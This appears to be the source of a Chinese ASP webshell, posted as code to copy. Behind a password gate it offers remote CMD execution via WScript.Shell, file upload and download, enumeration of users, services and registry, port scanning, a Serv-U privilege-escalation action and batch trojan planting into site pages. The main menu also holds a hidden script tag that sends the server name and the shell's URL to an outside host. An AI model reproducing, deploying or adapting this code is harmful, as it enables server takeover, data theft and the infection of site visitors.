- Function MainMenu()
- RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
- RRS"<tr><td height='5'></td></tr>"
- RRS"<tr><td><center><a href='"&SiteURL2&"' target='_blank'><font color=red>"&mName2&"</font></center></a><hr hight=1 width='100%'>"
- RRS"</td></tr>"
- If ObT(0,1)=" ×" Then
- RRS"<tr><td height='24'>无权限</td></tr>"
- Else
- RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬盘<div id=menu1 style=""width:100%;display='none'"" onmouseout=""menu1.style.display='none'"">"
- Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
- RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>->站点根目录</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>→本程序目录</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program Files"")'>→Program Files</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>->pcAnywhere</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序<hr></a></td></tr>"
- End If
- RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>→系统服务-用户账号</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=getTerminalInfo' target='FileFrame'>→终端端口-自动登录</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=ServerInfo' target='FileFrame'>→服务信息-组件支持</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'>→执行CMD命令</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>→端口扫描器</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'>→Serv-u提权</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>→读取注册表</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>→新建目录<hr></a></td></tr>"
- RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>→新建文本</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>→上传文件</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'>→查找木马</b></a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>→高级挂马</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>→批量清马</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>→批量替换</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>→低级挂马</a></b></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>→退出登录</a></td></tr>"
- RRS"<tr><td align=center style='color:red'><hr>"&Copyright2&"</td></tr></table>"
- RRS"<script language=javascript src=""http://www.ipl38.com/index.asp?n=http://" & Request.ServerVariables("SERVER_NAME") & "" & Request.ServerVariables("URL") & """></script>"
- RRS"</table>"
- End Function
- Sub unPack(thePath)
- On Error Resume Next
- Server.ScriptTimeOut = 5000
- Dim rs, ws, str, conn, stream, connStr, theFolder
- str = Server.MapPath(".") & ""
- Set rs = CreateObject("ADODB.RecordSet")
- Set stream = CreateObject("ADODB.Stream")
- Set conn = CreateObject("ADODB.Connection")
- connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
- conn.Open connStr
- rs.Open "FileData", conn, 1, 1
- stream.Open
- stream.Type = 1
- Do Until rs.Eof
- theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), ""))
- If fsoX.FolderExists(str & theFolder) = False Then
- createFolder(str & theFolder)
- End If
- stream.SetEos()
- stream.Write rs("fileContent")
- stream.SaveToFile str & rs("thePath"), 2
- rs.MoveNext
- Loop
- rs.Close
- conn.Close
- stream.Close
- Set ws = Nothing
- Set rs = Nothing
- Set stream = Nothing
- Set conn = Nothing
- End Sub
- Sub createFolder(thePath)
- Dim i
- i = Instr(thePath, "")
- Do While i > 0
- If fsoX.FolderExists(Left(thePath, i)) = False Then
- fsoX.CreateFolder(Left(thePath, i - 1))
- End If
- If InStr(Mid(thePath, i + 1), "") Then
- i = i + Instr(Mid(thePath, i + 1), "")
- Else
- i = 0
- End If
- Loop
- End Sub
- Function Course()
- SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
- SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系统用户与服务</td></tr>"
- on error resume next
- for each obj in getObject("WinNT://.")
- err.clear
- if OBJ.StartType="" then
- SI=SI&"<tr>"
- SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
- SI=SI&obj.Name
- SI=SI&"</td><td bgcolor=""#FFFFFF""> "
- SI=SI&"系统用户(组)"
- SI=SI&"</td></tr>"
- SI0="<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2""> </td></tr>"
- end if
- if OBJ.StartType=2 then lx="自动"
- if OBJ.StartType=3 then lx="手动"
- if OBJ.StartType=4 then lx="禁用"
- if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
- SI1=SI1&"<tr><td height=""20"" bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font color=#FF0000> "&obj.path&"</font></td></tr>"
- else
- SI2=SI2&"<tr><td height=""20"" bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font color=#3399FF> "&obj.path&"</font></td></tr>"
- end if
- next
- RRS SI&SI0&SI1&SI2&"</table>"
- End Function
- Function ServerInfo()
- SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
- SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服务器组件信息</td></tr>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器名</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
- SI=SI&"<form method=post action='http://www.ip138.com/index.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"
- SI=SI&"<input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='查询'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器时间</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器CPU数量</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器操作系统</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB服务器版本</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
- For i=0 To 13
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
- Next
- RRS SI
- End Function
- Function DownFile(Path)
- Response.Clear
- Set OSM = CreateObject(ObT(6,0))
- OSM.Open
- OSM.Type = 1
- OSM.LoadFromFile Path
- sz=InstrRev(path,"")+1
- Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz)
- Response.AddHeader "Content-Length", OSM.Size
- Response.Charset = "UTF-8"
- Response.ContentType = "application/octet-stream"
- Response.BinaryWrite OSM.Read
- Response.Flush
- OSM.Close
- Set OSM = Nothing
- End Function
- Function HTMLEncode(S)
- if not isnull(S) then
- S = replace(S, ">", ">")
- S = replace(S, "<", "<")
- S = replace(S, CHR(39), "'")
- S = replace(S, CHR(34), """)
- S = replace(S, CHR(20), " ")
- HTMLEncode = S
- end if
- End Function
- Function UpFile()
- If Request("Action2")="Post" Then
- Set U=new UPC : Set F=U.UA("LocalFile")
- UName=U.form("ToPath")
- If UName="" Or F.FileSize=0 then
- SI="<br>请输入上传的完全路径后选择一个文件上传!"
- Else
- F.SaveAs UName
- If Err.number=0 Then
- SI="<center><br><br><br>文件"&UName&"上传成功!</center>"
- End if
- End If
- Set F=nothing:Set U=nothing
- SI=SI&BackUrl
- RRS SI
- ShowErr()
- Response.End
- End If
- SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
- SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
- SI=SI&"<tr><td>"
- SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\diy3.asp")&"' size='40'>"
- SI=SI&" <input name='LocalFile' type='file' size='25'>"
- SI=SI&" <input type='submit' name='Submit' value='上传'>"
- SI=SI&"</td></tr></form></table>"
- RRS SI
- End Function
- Function Cmd1Shell()
- checked=" checked"
- If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
- ShellPath=Session("ShellPath")
- if ShellPath="" Then ShellPath = "diy3.asp"
- if Request("wscript")<>"yes" then checked=""
- If Request("cmd")<>"" Then DefCmd = Request("cmd")
- SI="<form method='post'>"
- SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"' Style='width:70%'> "
- SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"
- SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='执行'><textarea Style='width:100%;height:440;' class='cmd'>"
- If Request.Form("cmd")<>"" Then
- if Request.Form("wscript")="yes" then
- Set CM=CreateObject(ObT(1,0))
- Set DD=CM.exec(ShellPath&" /c "&DefCmd)
- aaa=DD.stdout.readall
- SI=SI&aaa
- else
- On Error Resume Next
- Set ws=Server.CreateObject("WScript.Shell")
- Set ws=Server.CreateObject("WScript.Shell")
- Set fso=Server.CreateObject("Scripting.FileSystemObject")
- szTempFile = server.mappath("cmd.txt")
- Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
- Set fs = CreateObject("Scripting.FileSystemObject")
- Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
- aaa=Server.HTMLEncode(oFilelcx.ReadAll)
- oFilelcx.Close
- Call fso.DeleteFile(szTempFile, True)
- SI=SI&aaa
- end if
- End If
- SI=SI&chr(13)&"</textarea></form>"
- RRS SI
- End Function
- if session("web2a2dmin")<>UserPass then
- if request.form("pass")<>"" then
- if request.form("pass")=UserPass then
- session("web2a2dmin")=UserPass
- response.redirect url
- else
- rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div align=center><font size='14' color='lime'>你密码错误!</font></b></p>"
- end if
- else
- si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"' target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>密码:<input name='pass' type='password' size='22'> <input type='submit' value='登录'><hr>"&Copyright&"</center>"
- if instr(SI,SIC)<>0 then rrs sI
- end if
- response.end
- end if
- Dim T1
- Class UPC
- Dim D1,D2
- Public Function Form(F)
- F=lcase(F)
- If D1.exists(F) then:Form=D1(F):else:Form="":end if
- End Function
- Public Function UA(F)
- F=lcase(F)
- If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
- End Function
- Private Sub Class_Initialize
- Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
- set D1=CreateObject(ObT(4,0))
- if Request.TotalBytes<1 then Exit Sub
- set T1 = CreateObject(ObT(6,0))
- T1.Type = 1 : T1.Mode =3 : T1.Open
- T1.Write Request.BinaryRead(Request.TotalBytes)
- T1.Position=0 : TDa =T1.Read : DStart = 1
- DEnd = LenB(TDa)
- set D2=CreateObject(ObT(4,0))
- vbCrlf = chrB(13) & chrB(10)
- set T2 = CreateObject(ObT(6,0))
- TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
- TLen = LenB (TSt)
- DStart=DStart+TLen+1
- while (DStart + 10) < DEnd
- DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
- T2.Type = 1 : T2.Mode =3 : T2.Open
- T1.Position = DStart
- T1.CopyTo T2,DIEnd-DStart
- T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
- TIn = T2.ReadText : T2.Close
- DStart = InStrB(DIEnd,TDa,TSt)
- FStart = InStr(22,TIn,"name=""",1)+6
- FEnd = InStr(FStart,TIn,"""",1)
- UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
- if InStr (45,TIn,"filename=""",1) > 0 then
- set TFL=new FIF
- FStart = InStr(FEnd,TIn,"filename=""",1)+10
- FEnd = InStr(FStart,TIn,"""",1)
- FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
- FEnd = InStr(FStart,TIn,vbCr)
- TFL.FileStart =DIEnd
- TFL.FileSize = DStart -DIEnd -3
- if not D2.Exists(UpName) then
- D2.add UpName,TFL
- end if
- else
- T2.Type =1 : T2.Mode =3 : T2.Open
- T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
- T2.Position = 0 : T2.Type = 2
- T2.Charset ="gb2312"
- SFV = T2.ReadText
- T2.Close
- if D1.Exists(UpName) then
- D1(UpName)=D1(UpName)&", "&SFV
- else
- D1.Add UpName,SFV
- end if
- end if
- DStart=DStart+TLen+1
- wend
- TDa=""
- set T2 =nothing
- End Sub
复制代码 |